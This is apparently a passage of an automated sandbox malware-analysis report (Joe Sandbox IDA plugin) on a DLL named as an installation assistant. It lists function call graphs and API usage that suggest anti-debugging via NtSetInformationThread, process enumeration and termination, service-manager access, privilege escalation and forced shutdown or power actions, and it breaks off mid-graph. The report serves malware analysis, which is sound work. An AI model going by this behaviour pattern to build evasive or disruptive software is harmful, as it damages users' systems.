99662->99663 99664 6ce46608 99662->99664 99678 6ce46601 99663->99678 99685 6cd12250 30 API calls 99663->99685 99670 6ce46619 99664->99670 99683 6cd13560 32 API calls std::_Xinvalid_argument 99664->99683 99667 6ce467e8 99686 6cd12340 24 API calls 99667->99686 99669 6ce467f7 99687 6ce49379 RaiseException 99669->99687 99670->99678 99684 6cd12f60 42 API calls 4 library calls 99670->99684 99674 6ce46827 99689 6cd12340 24 API calls 99674->99689 99676 6ce4683d 99690 6ce49379 RaiseException 99676->99690 99678->99265 99679 6ce46653 99679->99678 99688 6cd12250 30 API calls 99679->99688 99680->99265 99681->99265 99682->99265 99683->99670 99684->99679 99685->99667 99686->99669 99687->99679 99688->99674 99689->99676 99690->99678 99691->99271 99692->99273 99693->99271 99694->99271 99695->99271 99697 6cd1022e 99696->99697 99698 6cd104d6 99697->99698 99703 6ce517db 99697->99703 99698->99283 99700->99285 99701->99287 99702->99289 99704 6ce51806 99703->99704 99705 6ce517e9 99703->99705 99704->99697 99705->99704 99706 6ce517f6 99705->99706 99707 6ce5180a 99705->99707 99719 6ce50120 18 API calls __cftoe 99706->99719 99711 6ce51a02 99707->99711 99712 6ce51a0e __wsopen_s 99711->99712 99720 6ce4c5a9 EnterCriticalSection 99712->99720 99714 6ce51a1c 99721 6ce519bf 99714->99721 99718 6ce5183c 99718->99697 99719->99704 99720->99714 99729 6ce585a6 99721->99729 99727 6ce519f9 99728 6ce51a51 LeaveCriticalSection 99727->99728 99728->99718 99730 6ce59c60 18 API calls 99729->99730 99731 6ce585b7 99730->99731 99732 6ce619e5 __wsopen_s 18 API calls 99731->99732 99734 6ce585bd __wsopen_s 99732->99734 99733 6ce519d3 99736 6ce5183e 99733->99736 99734->99733 99746 6ce547bb HeapFree GetLastError _free 99734->99746 99738 6ce51850 99736->99738 99740 6ce5186e 99736->99740 99737 6ce5185e 99747 6ce50120 18 API calls __cftoe 99737->99747 99738->99737 99738->99740 99741 6ce51886 _Yarn 99738->99741 99745 6ce58659 62 API calls 99740->99745 99741->99740 99742 6ce50cb9 62 API calls 99741->99742 99743 6ce59c60 18 API calls 99741->99743 99744 6ce5bb6c __wsopen_s 62 API calls 99741->99744 99742->99741 99743->99741 99744->99741 99745->99727 99746->99733 99747->99740 99748->99306 99749->99308 99750->99310 99751->99207 99752->99214 99753->99216 99754->99209 99755->99212 99756 6ce4ef3f 99757 6ce4ef4b __wsopen_s 99756->99757 99758 6ce4ef52 GetLastError ExitThread 99757->99758 99759 6ce4ef5f 99757->99759 99768 6ce549b2 GetLastError 99759->99768 99764 6ce4ef7b 99801 6ce4eeaa 16 API calls 2 library calls 99764->99801 99767 6ce4ef9d 99769 6ce549cf 99768->99769 99770 6ce549c9 99768->99770 99775 6ce549d5 SetLastError 99769->99775 99803 6ce56b62 6 API calls std::_Lockit::_Lockit 99769->99803 99802 6ce56b23 6 API calls std::_Lockit::_Lockit 99770->99802 99773 6ce549ed 99774 6ce549f1 99773->99774 99773->99775 99804 6ce571e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 99774->99804 99781 6ce4ef64 99775->99781 99782 6ce54a69 99775->99782 99777 6ce549fd 99779 6ce54a05 99777->99779 99780 6ce54a1c 99777->99780 99805 6ce56b62 6 API calls std::_Lockit::_Lockit 99779->99805 99807 6ce56b62 6 API calls std::_Lockit::_Lockit 99780->99807 99795 6ce59d66 99781->99795 99810 6ce50ac9 37 API calls std::locale::_Setgloballocale 99782->99810 99786 6ce54a13 99806 6ce547bb HeapFree GetLastError _free 99786->99806 99788 6ce54a28 99789 6ce54a3d 99788->99789 99790 6ce54a2c 99788->99790 99809 6ce547bb HeapFree GetLastError _free 99789->99809 99808 6ce56b62 6 API calls std::_Lockit::_Lockit 99790->99808 99793 6ce54a19 99793->99775 99796 6ce59d78 GetPEB 99795->99796 99799 6ce4ef6f 99795->99799 99797 6ce59d8b 99796->99797 99796->99799 99811 6ce56e18 5 API calls std::_Lockit::_Lockit 99797->99811 99799->99764 99800 6ce56d6f 5 API calls std::_Lockit::_Lockit 99799->99800 99800->99764 99801->99767 99802->99769 99803->99773 99804->99777 99805->99786 99806->99793 99807->99788 99808->99786 99809->99793 99811->99799 99812 6ccc3d62 99813 6ccc3bc0 99812->99813 99814 6ccc3e8a GetCurrentThread NtSetInformationThread 99813->99814 99815 6ccc3eea 99814->99815 99816 6ccdf8a3 99817 6ccdf887 99816->99817 99818 6cce02ac GetCurrentProcess TerminateProcess 99817->99818 99819 6cce02ca 99818->99819 99820 6ccc4b53 99821 6ce46a43 std::_Facet_Register 4 API calls 99820->99821 99822 6ccc4b5c _Yarn 99821->99822 99823 6ce3aec0 2 API calls 99822->99823 99828 6ccc4bae std::ios_base::_Ios_base_dtor 99823->99828 99824 6cce639e 100011 6ce50130 18 API calls 2 library calls 99824->100011 99826 6ccc4cff 99827 6ccc5164 CreateFileA CloseHandle 99832 6ccc51ec 99827->99832 99828->99824 99828->99826 99828->99827 99829 6ccd245a _Yarn _strlen 99828->99829 99829->99824 99831 6ce3aec0 2 API calls 99829->99831 99847 6ccd2a83 std::ios_base::_Ios_base_dtor 99831->99847 99978 6ce45120 OpenSCManagerA 99832->99978 99834 6cccfc00 100004 6ce45240 CreateToolhelp32Snapshot 99834->100004 99836 6ce46a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 99873 6ccc5478 std::ios_base::_Ios_base_dtor _Yarn _strlen 99836->99873 99839 6ce3aec0 2 API calls 99839->99873 99840 6ccd37d0 Sleep 99884 6ccd37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 99840->99884 99841 6cce63b2 100012 6ccc15e0 18 API calls std::ios_base::_Ios_base_dtor 99841->100012 99842 6ce45240 4 API calls 99859 6ccd053a 99842->99859 99843 6ce45240 4 API calls 99869 6ccd12e2 99843->99869 99845 6cccffe3 99845->99842 99851 6ccd0abc 99845->99851 99846 6cce64f8 99847->99824 99982 6ce30390 99847->99982 99848 6cce6ba0 104 API calls 99848->99873 99849 6cce6e60 32 API calls 99849->99873 99851->99829 99851->99843 99852 6cce7090 77 API calls 99852->99873 99853 6ce45240 4 API calls 99853->99851 99854 6ce45240 4 API calls 99875 6ccd1dd9 99854->99875 99855 6ccd211c 99855->99829 99857 6ccd241a 99855->99857 99856 6cd0e010 67 API calls 99856->99873 99860 6ce30390 11 API calls 99857->99860 99858 6ce3aec0 2 API calls 99858->99884 99859->99851 99859->99853 99862 6ccd244d 99860->99862 99861 6ccc6722 100001 6ce41880 25 API calls 4 library calls 99861->100001 100010 6ce45d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 99862->100010 99864 6ccd2452 Sleep 99864->99829 99865 6ccc6162 99866 6ccd16ac 99867 6ce44ff0 4 API calls 99877 6ccc775a _strlen 99867->99877 99868 6ccc740b 99868->99867 99869->99854 99869->99855 99869->99866 99870 6ce45240 4 API calls 99870->99855 99871 6cce6ba0 104 API calls 99871->99884 99873->99824 99873->99834 99873->99836 99873->99839 99873->99848 99873->99849 99873->99852 99873->99856 99873->99861 99873->99865 99874 6cce7090 77 API calls 99874->99884 99875->99855 99875->99870 99876 6cd0e010 67 API calls 99876->99884 99877->99824 99878 6ccc7ba9 99877->99878 99879 6ccc7b92 99877->99879 99882 6ccc7b43 _Yarn 99877->99882 99881 6ce46a43 std::_Facet_Register 4 API calls 99878->99881 99880 6ce46a43 std::_Facet_Register 4 API calls 99879->99880 99880->99882 99881->99882 99883 6ce3aec0 2 API calls 99882->99883 99892 6ccc7be7 std::ios_base::_Ios_base_dtor 99883->99892 99884->99824 99884->99858 99884->99871 99884->99874 99884->99876 99991 6cce6e60 99884->99991 99885 6ce44ff0 4 API calls 99896 6ccc8a07 99885->99896 99886 6ccc9d7f 99889 6ce46a43 std::_Facet_Register 4 API calls 99886->99889 99887 6ccc9d68 99888 6ce46a43 std::_Facet_Register 4 API calls 99887->99888 99890 6ccc9d18 _Yarn 99888->99890 99889->99890 99891 6ce3aec0 2 API calls 99890->99891 99899 6ccc9dbd std::ios_base::_Ios_base_dtor 99891->99899 99892->99824 99892->99885 99893 6ccc962c _strlen 99892->99893 99894 6ccc8387 99892->99894 99893->99824 99893->99886 99893->99887 99893->99890 99895 6ce44ff0 4 API calls 99904 6ccc9120 99895->99904 99896->99895 99897 6ce44ff0 4 API calls 99914 6ccca215 _strlen 99897->99914 99898 6ce44ff0 4 API calls 99900 6ccc9624 99898->99900 99899->99824 99899->99897 99905 6ccce8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 99899->99905 100002 6ce45d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 99900->100002 99901 6ce46a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 99901->99905 99903 6ce3aec0 2 API calls 99903->99905 99904->99898 99905->99824 99905->99901 99905->99903 99906 6cccf7b1 99905->99906 99907 6ccced02 Sleep 99905->99907 100003 6ce45d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 99906->100003 99926 6ccce8c1 99907->99926 99909 6ccce8dd GetCurrentProcess TerminateProcess 99909->99905 99910 6ccca9bb 99913 6ce46a43 std::_Facet_Register 4 API calls 99910->99913 99911 6ccca9a4 99912 6ce46a43 std::_Facet_Register 4 API calls 99911->99912 99921 6ccca953 _Yarn _strlen 99912->99921 99913->99921 99914->99824 99914->99910 99914->99911 99914->99921 99915 6ce44ff0 4 API calls 99915->99926 99916 6cccfbb8 99917 6cccfbe8 ExitWindowsEx Sleep 99916->99917 99917->99834 99918 6cccf7c0 99918->99916 99919 6cccb009 99923 6ce46a43 std::_Facet_Register 4 API calls 99919->99923 99920 6cccaff0 99922 6ce46a43 std::_Facet_Register 4 API calls 99920->99922 99921->99841 99921->99919 99921->99920 99924 6cccafa0 _Yarn 99921->99924 99922->99924 99923->99924 99925 6ce45960 104 API calls 99924->99925 99927 6cccb059 std::ios_base::_Ios_base_dtor _strlen 99925->99927 99926->99905 99926->99909 99926->99915 99927->99824 99928 6cccb42c 99927->99928 99929 6cccb443 99927->99929 99932 6cccb3da _Yarn _strlen 99927->99932 99930 6ce46a43 std::_Facet_Register 4 API calls 99928->99930 99931 6ce46a43 std::_Facet_Register 4 API calls 99929->99931 99930->99932 99931->99932 99932->99841 99933 6cccb79e 99932->99933 99934 6cccb7b7 99932->99934 99937 6cccb751 _Yarn 99932->99937 99935 6ce46a43 std::_Facet_Register 4 API calls 99933->99935 99936 6ce46a43 std::_Facet_Register 4 API calls 99934->99936 99935->99937 99936->99937 99938 6ce45960 104 API calls 99937->99938 99939 6cccb804 std::ios_base::_Ios_base_dtor _strlen 99938->99939 99939->99824 99940 6cccbc0f 99939->99940 99941 6cccbc26 99939->99941 99944 6cccbbbd _Yarn _strlen 99939->99944 99942 6ce46a43 std::_Facet_Register 4 API calls 99940->99942 99943 6ce46a43 std::_Facet_Register 4 API calls 99941->99943 99942->99944 99943->99944 99944->99841 99945 6cccc08e 99944->99945 99946 6cccc075 99944->99946 99949 6cccc028 _Yarn 99944->99949 99948 6ce46a43 std::_Facet_Register 4 API calls 99945->99948 99947 6ce46a43 std::_Facet_Register 4 API calls 99946->99947 99947->99949 99948->99949 99950 6ce45960 104 API calls 99949->99950 99955 6cccc0db std::ios_base::_Ios_base_dtor _strlen 99950->99955 99951 6cccc7bc 99954 6ce46a43 std::_Facet_Register 4 API calls 99951->99954 99952 6cccc7a5 99953 6ce46a43 std::_Facet_Register 4 API calls 99952->99953 99962 6cccc753 _Yarn _strlen 99953->99962 99954->99962 99955->99824 99955->99951 99955->99952 99955->99962 99956 6cccd3ed 99958 6ce46a43 std::_Facet_Register 4 API calls 99956->99958 99957 6cccd406 99959 6ce46a43 std::_Facet_Register 4 API calls 99957->99959 99960 6cccd39a _Yarn 99958->99960 99959->99960 99961 6ce45960 104 API calls 99960->99961 99963 6cccd458 std::ios_base::_Ios_base_dtor _strlen 99961->99963 99962->99841 99962->99956 99962->99957 99962->99960 99968 6ccccb2f 99962->99968 99963->99824 99964 6cccd8bb 99963->99964 99965 6cccd8a4 99963->99965 99969 6cccd852 _Yarn _strlen 99963->99969 99967 6ce46a43 std::_Facet_Register 4 API calls 99964->99967 99966 6ce46a43 std::_Facet_Register 4 API calls 99965->99966 99966->99969 99967->99969 99969->99841 99970 6cccdccf 99969->99970 99971 6cccdcb6 99969->99971 99974 6cccdc69 _Yarn 99969->99974 99973 6ce46a43 std::_Facet_Register 4 API calls 99970->99973 99972 6ce46a43 std::_Facet_Register 4 API calls 99971->99972 99972->99974 99973->99974 99975 6ce45960 104 API calls 99974->99975 99977 6cccdd1c std::ios_base::_Ios_base_dtor 99975->99977 99976 6ce44ff0 4 API calls 99976->99905 99977->99824 99977->99976 99980 6ce45156 99978->99980 99979 6ce451e8 OpenServiceA 99979->99980 99980->99979 99981 6ce4522f 99980->99981 99981->99873 99988 6ce303a3 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 99982->99988 99983 6ce3310e CloseHandle 99983->99988 99984 6ce33f5f CloseHandle 99984->99988 99985 6ce3251b CloseHandle 99985->99988 99986 6ccd37cb 99990 6ce45d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 99986->99990 99987 6ce1c1e0 WriteFile WriteFile WriteFile ReadFile 99987->99988 99988->99983 99988->99984 99988->99985 99988->99986 99988->99987 100013 6ce1b730 99988->100013 99990->99840 99992 6cce6e9f 99991->99992 99995 6cce6eb3 99992->99995 100024 6cd13560 32 API calls std::_Xinvalid_argument 99992->100024 99997 6cce6f5b 99995->99997 100026 6cd12250 30 API calls 99995->100026 100027 6cd126e0 24 API calls 4 library calls 99995->100027 100028 6ce49379 RaiseException 99995->100028 99996 6cce6f6e 99996->99884 99997->99996 100025 6cd137e0 32 API calls std::_Xinvalid_argument 99997->100025 100001->99868 100002->99893 100003->99918 100005 6ce452a0 std::locale::_Setgloballocale 100004->100005 100006 6ce45277 CloseHandle 100005->100006 100007 6ce45320 Process32NextW 100005->100007 100008 6ce453b1 100005->100008 100009 6ce45345 Process32FirstW 100005->100009 100006->100005 100007->100005 100008->99845 100009->100005 100010->99864 100012->99846 100014 6ce1b743 _Yarn __wsopen_s std::locale::_Setgloballocale 100013->100014 100015 6ce1c180 100014->100015 100017 6ce1bced CreateFileA 100014->100017 100018 6ce1aa30 100014->100018 100015->99988 100017->100014 100021 6ce1aa43 __wsopen_s std::locale::_Setgloballocale 100018->100021 100019 6ce1b43d WriteFile 100019->100021 100020 6ce1b3e9 WriteFile 100020->100021 100021->100019 100021->100020 100022 6ce1b718 100021->100022 100023 6ce1ab95 ReadFile 100021->100023 100022->100014 100023->100021 100024->99995 100025->99996 100026->99995 100027->99995 100028->99995
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: _strlen
                                • String ID: HR^
                                • API String ID: 4218353326-1341859651
                                • Opcode ID: 1224f8483f72399d39269c476cd42dc528f36c49a4760d6a64fb1a0e38d0475b
                                • Instruction ID: 0940754833028771d80f31c3973c1ac06b4c796905158a3bf1b764c961c2c8ce
                                • Opcode Fuzzy Hash: 1224f8483f72399d39269c476cd42dc528f36c49a4760d6a64fb1a0e38d0475b
                                • Instruction Fuzzy Hash: 57740571744B018FC728CF29C8D0A96B7F3FF95318B198A6DC0A68BA55E774B44ACB41
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: }jk$;T55$L@^
                                • API String ID: 0-4218709813
                                • Opcode ID: f926644d7730bb8f0d983f1a9bda07c7131201a636865a7f8a612cdaf2add78b
                                • Instruction ID: 51e0eda2aa01bc8f7f9f621a59b00c9628b2ea884ada3e24e214bba76ffc2f91
                                • Opcode Fuzzy Hash: f926644d7730bb8f0d983f1a9bda07c7131201a636865a7f8a612cdaf2add78b
                                • Instruction Fuzzy Hash: DF340871644B018FC728CF29C8D0A96B7F3FFD5318B1A8A6DC1964BA55EB34B44ACB50

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7677 6ce45240-6ce45275 CreateToolhelp32Snapshot 7678 6ce452a0-6ce452a9 7677->7678 7679 6ce452e0-6ce452e5 7678->7679 7680 6ce452ab-6ce452b0 7678->7680 7683 6ce45377-6ce453a1 call 6ce52c05 7679->7683 7684 6ce452eb-6ce452f0 7679->7684 7681 6ce45315-6ce4531a 7680->7681 7682 6ce452b2-6ce452b7 7680->7682 7690 6ce453a6-6ce453ab 7681->7690 7691 6ce45320-6ce45332 Process32NextW 7681->7691 7686 6ce45334-6ce4535d call 6ce4b920 Process32FirstW 7682->7686 7687 6ce452b9-6ce452be 7682->7687 7683->7678 7688 6ce45277-6ce45292 CloseHandle 7684->7688 7689 6ce452f2-6ce452f7 7684->7689 7696 6ce45362-6ce45372 7686->7696 7687->7678 7694 6ce452c0-6ce452d1 7687->7694 7688->7678 7689->7678 7695 6ce452f9-6ce45313 7689->7695 7690->7678 7693 6ce453b1-6ce453bf 7690->7693 7691->7696 7694->7678 7695->7678 7696->7678
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6CE4524E
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: CreateSnapshotToolhelp32
                                • String ID:
                                • API String ID: 3332741929-0
                                • Opcode ID: da6ecf67cefe0941676726e15d05b7464a42baf6c66dc65ce8d0ffc122078ccc
                                • Instruction ID: 4a85a7f0eeeffabbd61c15df6e32917d7804eb091350d200c75442c62972a9a4
                                • Opcode Fuzzy Hash: da6ecf67cefe0941676726e15d05b7464a42baf6c66dc65ce8d0ffc122078ccc
                                • Instruction Fuzzy Hash: 42316D7460A3009FD7109F28DC88B0ABBF5AF96748FA0892EF598D7760D371D8498B57

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7821 6ccc3886-6ccc388e 7822 6ccc3894-6ccc3896 7821->7822 7823 6ccc3970-6ccc397d 7821->7823 7822->7823 7826 6ccc389c-6ccc38b9 7822->7826 7824 6ccc397f-6ccc3989 7823->7824 7825 6ccc39f1-6ccc39f8 7823->7825 7824->7826 7827 6ccc398f-6ccc3994 7824->7827 7828 6ccc39fe-6ccc3a03 7825->7828 7829 6ccc3ab5-6ccc3aba 7825->7829 7830 6ccc38c0-6ccc38c1 7826->7830 7832 6ccc399a-6ccc399f 7827->7832 7833 6ccc3b16-6ccc3b18 7827->7833 7834 6ccc3a09-6ccc3a2f 7828->7834 7835 6ccc38d2-6ccc38d4 7828->7835 7829->7826 7831 6ccc3ac0-6ccc3ac7 7829->7831 7836 6ccc395e 7830->7836 7831->7830 7838 6ccc3acd-6ccc3ad6 7831->7838 7839 6ccc383b-6ccc3855 call 6ce11470 call 6ce11480 7832->7839 7840 6ccc39a5-6ccc39bf 7832->7840 7833->7830 7841 6ccc38f8-6ccc3955 7834->7841 7842 6ccc3a35-6ccc3a3a 7834->7842 7843 6ccc3957-6ccc395c 7835->7843 7837 6ccc3960-6ccc3964 7836->7837 7845 6ccc396a 7837->7845 7846 6ccc3860-6ccc3885 7837->7846 7838->7833 7847 6ccc3ad8-6ccc3aeb 7838->7847 7839->7846 7848 6ccc3a5a-6ccc3a5d 7840->7848 7841->7843 7849 6ccc3b1d-6ccc3b22 7842->7849 7850 6ccc3a40-6ccc3a57 7842->7850 7843->7836 7852 6ccc3ba1-6ccc3bb6 7845->7852 7846->7821 7847->7841 7853 6ccc3af1-6ccc3af8 7847->7853 7857 6ccc3aa9-6ccc3ab0 7848->7857 7855 6ccc3b49-6ccc3b50 7849->7855 7856 6ccc3b24-6ccc3b44 7849->7856 7850->7848 7864 6ccc3bc0-6ccc3bda call 6ce11470 call 6ce11480 7852->7864 7859 6ccc3afa-6ccc3aff 7853->7859 7860 6ccc3b62-6ccc3b85 7853->7860 7855->7830 7863 6ccc3b56-6ccc3b5d 7855->7863 7856->7857 7857->7837 7859->7843 7860->7841 7867 6ccc3b8b 7860->7867 7863->7837 7872 6ccc3be0-6ccc3bfe 7864->7872 7867->7852 7875 6ccc3e7b 7872->7875 7876 6ccc3c04-6ccc3c11 7872->7876 7877 6ccc3e81-6ccc3ee0 call 6ccc3750 GetCurrentThread NtSetInformationThread 7875->7877 7878 6ccc3c17-6ccc3c20 7876->7878 7879 6ccc3ce0-6ccc3cea 7876->7879 7896 6ccc3eea-6ccc3f04 call 6ce11470 call 6ce11480 7877->7896 7881 6ccc3dc5 7878->7881 7882 6ccc3c26-6ccc3c2d 7878->7882 7883 6ccc3cec-6ccc3d0c 7879->7883 7884 6ccc3d3a-6ccc3d3c 7879->7884 7886 6ccc3dc6 7881->7886 7887 6ccc3dc3 7882->7887 7888 6ccc3c33-6ccc3c3a 7882->7888 7889 6ccc3d90-6ccc3d95 7883->7889 7890 6ccc3d3e-6ccc3d45 7884->7890 7891 6ccc3d70-6ccc3d8d 7884->7891 7893 6ccc3dc8-6ccc3dcc 7886->7893 7887->7881 7897 6ccc3e26-6ccc3e2b 7888->7897 7898 6ccc3c40-6ccc3c5b 7888->7898 7894 6ccc3dba-6ccc3dc1 7889->7894 7895 6ccc3d97-6ccc3db8 7889->7895 7892 6ccc3d50-6ccc3d57 7890->7892 7891->7889 7892->7886 7893->7872 7899 6ccc3dd2 7893->7899 7894->7887 7900 6ccc3dd7-6ccc3ddc 7894->7900 7895->7881 7915 6ccc3f75-6ccc3fa1 7896->7915 7902 6ccc3c7b-6ccc3cd0 7897->7902 7903 6ccc3e31 7897->7903 7904 6ccc3e1b-6ccc3e24 7898->7904 7905 6ccc3e76-6ccc3e79 7899->7905 7906 6ccc3dde-6ccc3e17 7900->7906 7907 6ccc3e36-6ccc3e3d 7900->7907 7902->7892 7903->7864 7904->7893 7904->7905 7905->7877 7906->7904 7911 6ccc3e5c-6ccc3e5f 7907->7911 7912 6ccc3e3f-6ccc3e5a 7907->7912 7911->7902 7914 6ccc3e65-6ccc3e69 7911->7914 7912->7904 7914->7893 7914->7905 7919 6ccc4020-6ccc4026 7915->7919 7920 6ccc3fa3-6ccc3fa8 7915->7920 7923 6ccc402c-6ccc403c 7919->7923 7924 6ccc3f06-6ccc3f35 7919->7924 7921 6ccc407c-6ccc4081 7920->7921 7922 6ccc3fae-6ccc3fcf 7920->7922 7926 6ccc40aa-6ccc40ae 7921->7926 7929 6ccc4083-6ccc408a 7921->7929 7922->7926 7927 6ccc403e-6ccc4058 7923->7927 7928 6ccc40b3-6ccc40b8 7923->7928 7925 6ccc3f38-6ccc3f61 7924->7925 7930 6ccc3f64-6ccc3f67 7925->7930 7931 6ccc3f6b-6ccc3f6f 7926->7931 7932 6ccc405a-6ccc4063 7927->7932 7928->7922 7934 6ccc40be-6ccc40c9 7928->7934 7929->7925 7933 6ccc4090 7929->7933 7935 6ccc3f69 7930->7935 7931->7915 7936 6ccc4069-6ccc406c 7932->7936 7937 6ccc40f5-6ccc413f 7932->7937 7933->7896 7938 6ccc40a7 7933->7938 7934->7926 7939 6ccc40cb-6ccc40d4 7934->7939 7935->7931 7942 6ccc4144-6ccc414b 7936->7942 7943 6ccc4072-6ccc4077 7936->7943 7937->7935 7938->7926 7939->7938 7940 6ccc40d6-6ccc40f0 7939->7940 7940->7932 7942->7931 7943->7930
                                Memory Dump Source
                                • Source File: 00000006.00000002.2301045129.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true
                                • Associated: 00000006.00000002.2301019803.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302230556.000000006CE68000.00000002.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2302315027.000000006CE78000.00000008.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303009150.000000006CF43000.00000004.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303038369.000000006CF49000.00000020.00000001.01000000.00000009.sdmpDownload File
                                • Associated: 00000006.00000002.2303792682.000000006D032000.00000002.00000001.01000000.00000009.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_6ccc0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6aab1d457ebed03b4715733f389b754310652321a9f9f5e1c09f2e7e71214aff
                                • Instruction ID: f530203ea79ae266aa033d22bf87fe323121091a99f333b762568eb6387d4344
                                • Opcode Fuzzy Hash: 6aab1d457ebed03b4715733f389b754310652321a9f9f5e1c09f2e7e71214aff
                                • Instruction Fuzzy Hash: 2432F032345B018FC324CF29D8D06E6B7E3EFD131472D8A6DC0AA4BA95E774B44A8B51

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7969 6ccc3a6a-6ccc3a85 7970 6ccc3a87-6ccc3aa7 7969->7970 7971 6ccc3aa9-6ccc3ab0 7970->7971 7972 6ccc3960-6ccc3964 7971->7972 7973 6ccc396a 7972->7973 7974 6ccc3860-6ccc388e 7972->7974 7975 6ccc3ba1-6ccc3bb6 7973->7975 7984 6ccc3894-6ccc3896 7974->7984 7985 6ccc3970-6ccc397d 7974->7985 7978 6ccc3bc0-6ccc3bda call 6ce11470 call 6ce11480 7975->7978 7990 6ccc3be0-6ccc3bfe 7978->7990 7984->7985 7989 6ccc389c-6ccc38b9 7984->7989 7987 6ccc397f-6ccc3989 7985->7987 7988 6ccc39f1-6ccc39f8 7985->7988 7987->7989 7991 6ccc398f-6ccc3994 7987->7991 7992 6ccc39fe-6ccc3a03 7988->7992 7993 6ccc3ab5-6ccc3aba 7988->7993 7994 6ccc38c0-6ccc38c1 7989->7994 8011 6ccc3e7b 7990->8011 8012 6ccc3c04-6ccc3c11 7990->8012 7997 6ccc399a-6ccc399f 7991->7997 7998 6ccc3b16-6ccc3b18 7991->7998 7999 6ccc3a09-6ccc3a2f 7992->7999 8000 6ccc38d2-6ccc38d4 7992->8000 7993->7989 7995 6ccc3ac0-6ccc3ac7 7993->7995 8001 6ccc395e 7994->8001 7995->7994 8002 6ccc3acd-6ccc3ad6 7995->8002 8004 6ccc383b-6ccc3855 call 6ce11470 call 6ce11480 7997->8004 8005 6ccc39a5-6ccc39bf 7997->8005 7998->7994 8006 6ccc38f8-6ccc3955 7999->8006 8007 6ccc3a35-6ccc3a3a 7999->8007 8008 6ccc3957-6ccc395c 8000->8008 8001->7972 8002->7998 8010 6ccc3ad8-6ccc3aeb 8002->8010 8004->7974 8013 6ccc3a5a-6ccc3a5d 8005->8013 8006->8008 8014 6ccc3b1d-6ccc3b22 8007->8014 8015 6ccc3a40-6ccc3a57 8007->8015 8008->8001 8010->8006 8018 6ccc3af1-6ccc3af8 8010->8018 8017 6ccc3e81-6ccc3ee0 call 6ccc3750 GetCurrentThread NtSetInformationThread 8011->8017 8019 